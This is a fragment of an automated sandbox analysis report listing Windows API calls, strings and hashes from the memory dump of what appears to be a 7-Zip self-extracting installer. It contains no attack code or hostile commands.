                                                                                                                                                                  • Part of subcall function 004039E7: lstrlenW.KERNEL32(00401A74,00000000,?,?,?,?,?,?,00401A74,?), ref: 004039F4
                                                                                                                                                                  • Part of subcall function 004039E7: GetSystemTimeAsFileTime.KERNEL32(?,00401A74,?,?,?,?,00401A74,?), ref: 00403A6A
                                                                                                                                                                  • Part of subcall function 004039E7: GetFileAttributesW.KERNELBASE(?,?,?,?,?,00401A74,?), ref: 00403A71
                                                                                                                                                                  • Part of subcall function 004039E7: ??3@YAXPAX@Z.MSVCRT(?,00401A74,?,?,?,?,00401A74,?), ref: 00403B30
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.3383786075.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000008.00000002.3383500912.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3383929276.000000000041A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3384040841.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3384135474.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_4802836d37.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ??3@$FileTime$AttributesSystemlstrlen
                                                                                                                                                                • String ID: ;!@Install@!UTF-8!$;!@InstallEnd@!
                                                                                                                                                                • API String ID: 4038993085-372238525
                                                                                                                                                                • Opcode ID: ae470c15fb9ab93de0ad4030f77c14c07a8208b8d7926a28e8ed83b0eb248ccf
                                                                                                                                                                • Instruction ID: 1d6f72d44ce7b26bafcc2ee4707833dd2b606594c716bb38fa5c6a696ed85d5e
                                                                                                                                                                • Opcode Fuzzy Hash: ae470c15fb9ab93de0ad4030f77c14c07a8208b8d7926a28e8ed83b0eb248ccf
                                                                                                                                                                • Instruction Fuzzy Hash: 05311B7490022AAACF05EF92CD828EEBB79FF58318F10042BE810761E1DB795645DE58
                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.3383786075.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000008.00000002.3383500912.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3383929276.000000000041A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3384040841.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3384135474.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_4802836d37.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: wsprintf$ExitProcesslstrcat
                                                                                                                                                                • String ID: 0x%p
                                                                                                                                                                • API String ID: 2530384128-1745605757
                                                                                                                                                                • Opcode ID: 217280ca1667caf64bbadd46d79608ffb89a528de629757afe78e206874d1f67
                                                                                                                                                                • Instruction ID: 10afd36f4070d89f293b01a92875ce402ef2d19f58a346a7dbf4abb5c9f18492
                                                                                                                                                                • Opcode Fuzzy Hash: 217280ca1667caf64bbadd46d79608ffb89a528de629757afe78e206874d1f67
                                                                                                                                                                • Instruction Fuzzy Hash: 531182B5801208EFCB20EFB5DD85DDA73B8AF04304F00447BE645B3191D778AA948B5A
                                                                                                                                                                APIs
                                                                                                                                                                • ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000001,00000000,?,?,?), ref: 00402E98
                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?), ref: 00402EA1
                                                                                                                                                                  • Part of subcall function 004011B7: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,?,00000000,004014FF,00000003,?,00405C8B,?,00000000), ref: 004011D7
                                                                                                                                                                  • Part of subcall function 004011B7: ??3@YAXPAX@Z.MSVCRT(?,00000000,?,00000000,004014FF,00000003,?,00405C8B,?,00000000), ref: 004011FD
                                                                                                                                                                • ExpandEnvironmentStringsW.KERNEL32(SetEnvironment,00000000,00000001,00000001,SetEnvironment), ref: 00402EB9
                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?), ref: 00402ED9
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.3383786075.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000008.00000002.3383500912.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3383929276.000000000041A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3384040841.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3384135474.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_4802836d37.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ??3@$EnvironmentExpandStrings$??2@
                                                                                                                                                                • String ID: SetEnvironment
                                                                                                                                                                • API String ID: 612612615-360490078
                                                                                                                                                                • Opcode ID: a35de80e7cad52e5dc6298b6344b4de1a7c54804515ee2809541825fa383ffde
                                                                                                                                                                • Instruction ID: 9a1053b96c855abc576ef2a573940a7f22d1fb52882628247968529f0f67b02c
                                                                                                                                                                • Opcode Fuzzy Hash: a35de80e7cad52e5dc6298b6344b4de1a7c54804515ee2809541825fa383ffde
                                                                                                                                                                • Instruction Fuzzy Hash: 66015276900104BADB14AB95DD819EEB7BCEF48314F10416BFD01B21D1DB786A408A99
                                                                                                                                                                APIs
                                                                                                                                                                • lstrlenW.KERNEL32(0041E3F0,00000020,?,?,?,?,?,00406547,?,?), ref: 004049C2
                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,00406547,?,?), ref: 00404A74
                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(00406547,?,?,?,?,?,?,?,?,?,?,?,?,?,00406547,?), ref: 00404A7C
                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,00406547,?,?), ref: 00404A8B
                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(00406547,?,?,?,?,?,?,?,?,?,?,?,?,?,00406547,?), ref: 00404A93
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.3383786075.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000008.00000002.3383500912.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3383929276.000000000041A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3384040841.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3384135474.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_4802836d37.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ??3@$lstrlen
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2031685711-0
                                                                                                                                                                • Opcode ID: 48a0ad31e595b70fe055f92825f259cf0440ad4ba980cc005dca8c8d37490221
                                                                                                                                                                • Instruction ID: d6d6aeb9fd97b078be875a6c61f5694a486b541387e48e1a0363308d58f113ad
                                                                                                                                                                • Opcode Fuzzy Hash: 48a0ad31e595b70fe055f92825f259cf0440ad4ba980cc005dca8c8d37490221
                                                                                                                                                                • Instruction Fuzzy Hash: 2E21E3B6E40205ABCF206FB5CC029EB77A8EF84355F10447BEE41B72D1E7784D858A99
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 004081CE: GetSystemMetrics.USER32(0000000B), ref: 004081F6
                                                                                                                                                                  • Part of subcall function 004081CE: GetSystemMetrics.USER32(0000000C), ref: 004081FF
                                                                                                                                                                • GetSystemMetrics.USER32(00000007), ref: 0040883F
                                                                                                                                                                • GetSystemMetrics.USER32(00000007), ref: 00408850
                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,000004B8,?,?), ref: 00408917
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.3383786075.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000008.00000002.3383500912.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3383929276.000000000041A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3384040841.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3384135474.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_4802836d37.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: MetricsSystem$??3@
                                                                                                                                                                • String ID: 100%%
                                                                                                                                                                • API String ID: 2562992111-568723177
                                                                                                                                                                • Opcode ID: 35692a44e7e546f69739d1069c7bb9c29da4a7b1d3d728d8f1a694ecacf6944a
                                                                                                                                                                • Instruction ID: c0f787396fa6b3de95c2f82887938995bcf82f961e42ceb6ace71c8d1a060617
                                                                                                                                                                • Opcode Fuzzy Hash: 35692a44e7e546f69739d1069c7bb9c29da4a7b1d3d728d8f1a694ecacf6944a
                                                                                                                                                                • Instruction Fuzzy Hash: 51318171A007059FCB24EF6ACA459AEB7F4EF54704B00052ED982A72D1DB78FE44CB99
                                                                                                                                                                APIs
                                                                                                                                                                • lstrlenW.KERNEL32(00406EB0,00000000,?,ExecuteFile,0040454C,00000000,00000000,00406EB0,?,waitall,00000000,00000000,?,?,0041E9E8), ref: 00404512
                                                                                                                                                                • lstrlenW.KERNEL32(?,?,?,0041E9E8), ref: 0040451B
                                                                                                                                                                • _wcsnicmp.MSVCRT ref: 00404527
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.3383786075.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000008.00000002.3383500912.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3383929276.000000000041A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3384040841.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3384135474.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_4802836d37.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: lstrlen$_wcsnicmp
                                                                                                                                                                • String ID: ExecuteFile
                                                                                                                                                                • API String ID: 2823567412-323923146
                                                                                                                                                                • Opcode ID: 269407e104d2b8646f4c579596136b213b345037a5b1e74df4f09ef425281859
                                                                                                                                                                • Instruction ID: a2e0a5f2a3f105f817df911ac3b4dcd355adebb597ea1c4786e8ca368391ef02
                                                                                                                                                                • Opcode Fuzzy Hash: 269407e104d2b8646f4c579596136b213b345037a5b1e74df4f09ef425281859
                                                                                                                                                                • Instruction Fuzzy Hash: BFE04FF25052156BC6008FA5AC84C5BBBADEAC8356B540877F700E3112E735D8198BA6
                                                                                                                                                                APIs
                                                                                                                                                                • LoadLibraryA.KERNEL32(kernel32,Wow64RevertWow64FsRedirection,00407200,00000000,?,?), ref: 004026BE
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 004026C5
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.3383786075.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000008.00000002.3383500912.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3383929276.000000000041A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3384040841.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3384135474.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_4802836d37.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AddressLibraryLoadProc
                                                                                                                                                                • String ID: Wow64RevertWow64FsRedirection$kernel32
                                                                                                                                                                • API String ID: 2574300362-3900151262
                                                                                                                                                                • Opcode ID: 3995c828ef5ea128a58b39da0bfb34db2680510550d7971d05a4d895e470ae21
                                                                                                                                                                • Instruction ID: 82409627fcb45dd1da2fa5f3e3d8c344d82775180731f09fcf798d9da7421b86
                                                                                                                                                                • Opcode Fuzzy Hash: 3995c828ef5ea128a58b39da0bfb34db2680510550d7971d05a4d895e470ae21
                                                                                                                                                                • Instruction Fuzzy Hash: D4D0A7B4593608ABD7001B62EE0CFE276A56B40701F4480356400E00F0CBFD44D1CE1E
                                                                                                                                                                APIs
                                                                                                                                                                • LoadLibraryA.KERNEL32(kernel32,Wow64DisableWow64FsRedirection,00402735,?,0040713A,?,00000000,?,?), ref: 004026F0
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 004026F7
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.3383786075.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000008.00000002.3383500912.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3383929276.000000000041A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3384040841.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3384135474.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_4802836d37.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AddressLibraryLoadProc
                                                                                                                                                                • String ID: Wow64DisableWow64FsRedirection$kernel32
                                                                                                                                                                • API String ID: 2574300362-736604160
                                                                                                                                                                • Opcode ID: f4a940be1505b68c475d95e46af471e523fc035b46ed24cc81ed57c5cf537299
                                                                                                                                                                • Instruction ID: 4151df8360ba703b2413aa493284ccd41186626ab8f45a3e4bc2e954db12d2dd
                                                                                                                                                                • Opcode Fuzzy Hash: f4a940be1505b68c475d95e46af471e523fc035b46ed24cc81ed57c5cf537299
                                                                                                                                                                • Instruction Fuzzy Hash: C7D0C9B86936046AD6505BA6AD0DFE6B6A4AB80B02F9880296804E11E1C6FC4491DA2F
                                                                                                                                                                APIs
                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(00405CDB,00405CDB,00000000,?,?,?,?,?,?,?,?,?,?,00405CDB,?,00000000), ref: 004031D2
                                                                                                                                                                  • Part of subcall function 00402DCE: MultiByteToWideChar.KERNEL32(?,00000000,00000000,?,00000000,?,?,?,00000000,00000000,00403130,?,?,00000000,00000000,00000000), ref: 00402E00
                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,00405CDB,?), ref: 0040313F
                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,00405CDB), ref: 0040315A
                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00403162
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.3383786075.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000008.00000002.3383500912.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3383929276.000000000041A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3384040841.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3384135474.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_4802836d37.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ??3@$ByteCharMultiWide
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1731127917-0
                                                                                                                                                                • Opcode ID: 2045a8c988effd66839eecf1b1e0e6c37eff9953a9d0c56656d8fdf52f7b1370
                                                                                                                                                                • Instruction ID: 048da0cb2dc02d8916bdec43440a285b354a653a086483b302c5f7621bf0cf9b
                                                                                                                                                                • Opcode Fuzzy Hash: 2045a8c988effd66839eecf1b1e0e6c37eff9953a9d0c56656d8fdf52f7b1370
                                                                                                                                                                • Instruction Fuzzy Hash: AD31F672804109AACB14EFA6DC829EF77BCEF04315B10443FF856B61E1EB3C9A45C668
                                                                                                                                                                APIs
                                                                                                                                                                • GetTempPathW.KERNEL32(00000001,00000000,00000002,00000000,00407468,00000000,?,?,004057F7,?,7ZSfx%03x.cmd), ref: 004048C6
                                                                                                                                                                • GetTempPathW.KERNEL32(00000001,00000000,00000001,?,?,004057F7,?,7ZSfx%03x.cmd), ref: 004048E3
                                                                                                                                                                • wsprintfW.USER32 ref: 00404919
                                                                                                                                                                • GetFileAttributesW.KERNEL32(?), ref: 00404934
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.3383786075.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000008.00000002.3383500912.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3383929276.000000000041A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3384040841.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3384135474.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_4802836d37.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: PathTemp$AttributesFilewsprintf
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1746483863-0
                                                                                                                                                                • Opcode ID: a6dd081e242313139652bdc03ce0b2f176d2a7b6371b1423e210ce58af9a7749
                                                                                                                                                                • Instruction ID: 9a23dce76bf07ec62893e724c666a97d340ece38cae1712c454cfb59cab589fa
                                                                                                                                                                • Opcode Fuzzy Hash: a6dd081e242313139652bdc03ce0b2f176d2a7b6371b1423e210ce58af9a7749
                                                                                                                                                                • Instruction Fuzzy Hash: 5911E772200204BFD7119F55C845BAEB7B9FF84314F10842EF905D72E1DB79A9118B98
                                                                                                                                                                APIs
                                                                                                                                                                • _CxxThrowException.MSVCRT(00100EC3,0041C670), ref: 00412748
                                                                                                                                                                • ??2@YAPAXI@Z.MSVCRT(00000004,00000000,0041E3DC,?,?,00412815,0000007D,0041640F,0041E3DC,004035F5,00000000,?,00405789,?,00405D01,?), ref: 00412770
                                                                                                                                                                • memcpy.MSVCRT(00000000,00ABCA58,00000004,00000000,0041E3DC,?,?,00412815,0000007D,0041640F,0041E3DC,004035F5,00000000,?,00405789,?), ref: 00412799
                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(00ABCA58,00000000,0041E3DC,?,?,00412815,0000007D,0041640F,0041E3DC,004035F5,00000000,?,00405789,?,00405D01,?), ref: 004127A4
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.3383786075.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000008.00000002.3383500912.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3383929276.000000000041A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3384040841.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3384135474.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_4802836d37.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ??2@??3@ExceptionThrowmemcpy
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3462485524-0
                                                                                                                                                                • Opcode ID: 7565129bc99c0d9bd0404751a75788fc8418b784189d73e03d7ab145d8551701
                                                                                                                                                                • Instruction ID: 510514d82056c6b4fcd5a552fda661d2aed45214d42cdecf77f9d3eca8f48bd7
                                                                                                                                                                • Opcode Fuzzy Hash: 7565129bc99c0d9bd0404751a75788fc8418b784189d73e03d7ab145d8551701
                                                                                                                                                                • Instruction Fuzzy Hash: 0F110876200300ABCB289F16DAC0C9BF7EAAB84350720883FF569D7680C7B9ECD54758
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 00407920: GetDlgItem.USER32(?,?), ref: 0040792C
                                                                                                                                                                  • Part of subcall function 0040793D: GetDlgItem.USER32(?,?), ref: 0040794A
                                                                                                                                                                  • Part of subcall function 0040793D: ShowWindow.USER32(00000000,?), ref: 00407961
                                                                                                                                                                • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004091EF
                                                                                                                                                                • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00000103), ref: 0040920F
                                                                                                                                                                • GetDlgItem.USER32(?,000004B7), ref: 00409222
                                                                                                                                                                • SetWindowLongW.USER32(00000000,000000FC,Function_00007F86), ref: 00409230
                                                                                                                                                                  • Part of subcall function 00408E76: GetModuleHandleW.KERNEL32(00000000,00000065,000004B7,?,?,?,?,?,00409240), ref: 00408E9F
                                                                                                                                                                  • Part of subcall function 00408E76: LoadIconW.USER32(00000000), ref: 00408EA2
                                                                                                                                                                  • Part of subcall function 00408E76: GetSystemMetrics.USER32(00000032), ref: 00408EB6
                                                                                                                                                                  • Part of subcall function 00408E76: GetSystemMetrics.USER32(00000031), ref: 00408EBB
                                                                                                                                                                  • Part of subcall function 00408E76: GetModuleHandleW.KERNEL32(00000000,00000065,00000001,00000000,?,?,?,?,?,00409240), ref: 00408EC4
                                                                                                                                                                  • Part of subcall function 00408E76: LoadImageW.USER32(00000000), ref: 00408EC7
                                                                                                                                                                  • Part of subcall function 00408E76: SendMessageW.USER32(?,00000080,00000001,?), ref: 00408EE7
                                                                                                                                                                  • Part of subcall function 00408E76: SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00408EF0
                                                                                                                                                                  • Part of subcall function 00408E76: GetDlgItem.USER32(?,000004B2), ref: 00408F0C
                                                                                                                                                                  • Part of subcall function 00408E76: GetDlgItem.USER32(?,000004B2), ref: 00408F16
                                                                                                                                                                  • Part of subcall function 00408E76: GetWindowLongW.USER32(?,000000F0), ref: 00408F22
                                                                                                                                                                  • Part of subcall function 00408E76: SetWindowLongW.USER32(?,000000F0,00000000), ref: 00408F31
                                                                                                                                                                  • Part of subcall function 00408E76: GetDlgItem.USER32(?,000004B5), ref: 00408F3F
                                                                                                                                                                  • Part of subcall function 00408E76: GetDlgItem.USER32(?,000004B5), ref: 00408F4D
                                                                                                                                                                  • Part of subcall function 00408E76: GetWindowLongW.USER32(?,000000F0), ref: 00408F59
                                                                                                                                                                  • Part of subcall function 00408E76: SetWindowLongW.USER32(?,000000F0,00000000), ref: 00408F68
                                                                                                                                                                  • Part of subcall function 004082F3: GetDlgItem.USER32(?,000004B6), ref: 00408300
                                                                                                                                                                  • Part of subcall function 004082F3: SetFocus.USER32(00000000,?,?,004083E7,000004B6,?), ref: 00408307
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.3383786075.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000008.00000002.3383500912.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3383929276.000000000041A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3384040841.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3384135474.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_4802836d37.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Item$Window$Long$System$HandleLoadMessageMetricsModuleSend$DirectoryFileFocusIconImageInfoShow
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3043669009-0
                                                                                                                                                                • Opcode ID: f423f1c94b217a71c22aa920f9295f7036f4086fcedb7640a741d3f85b4acc7a
                                                                                                                                                                • Instruction ID: 3591c2bc138905537439c0aaf451187a84050bff03ea83390e11aea9625765cd
                                                                                                                                                                • Opcode Fuzzy Hash: f423f1c94b217a71c22aa920f9295f7036f4086fcedb7640a741d3f85b4acc7a
                                                                                                                                                                • Instruction Fuzzy Hash: B911C271F40314ABDB10EBA99D09F9A77BCAB84B04F00446FB241E32D1CAB899008B59
                                                                                                                                                                APIs
                                                                                                                                                                • SystemParametersInfoW.USER32(00000029,000001F4,?,00000000), ref: 00407825
                                                                                                                                                                • GetSystemMetrics.USER32(00000031), ref: 0040784B
                                                                                                                                                                • CreateFontIndirectW.GDI32(?), ref: 0040785A
                                                                                                                                                                • DeleteObject.GDI32(00000000), ref: 00407889
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.3383786075.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000008.00000002.3383500912.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3383929276.000000000041A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3384040841.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3384135474.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_4802836d37.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: System$CreateDeleteFontIndirectInfoMetricsObjectParameters
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1900162674-0
                                                                                                                                                                • Opcode ID: 5da47058ff94d5803732122388ffcc42587bfddbb95a0ced26d5b12eadc4e772
                                                                                                                                                                • Instruction ID: b25c457bbae17dd5d72c6f892d860256fe40de5a44a36179f6bad400e189aa1a
                                                                                                                                                                • Opcode Fuzzy Hash: 5da47058ff94d5803732122388ffcc42587bfddbb95a0ced26d5b12eadc4e772
                                                                                                                                                                • Instruction Fuzzy Hash: E4116376A00205AFDB149F54DC88BEAB7B8EB04304F0480AAED05A7391DB74AE40CB55
                                                                                                                                                                APIs
                                                                                                                                                                • ScreenToClient.USER32(?,?), ref: 00408D3B
                                                                                                                                                                • GetClientRect.USER32(?,?), ref: 00408D4D
                                                                                                                                                                • PtInRect.USER32(?,?,?), ref: 00408D5C
                                                                                                                                                                  • Part of subcall function 00408763: KillTimer.USER32(?,00000001,?,00408D71), ref: 00408771
                                                                                                                                                                • CallNextHookEx.USER32(?,?,?), ref: 00408D7E
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.3383786075.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000008.00000002.3383500912.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3383929276.000000000041A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3384040841.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3384135474.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
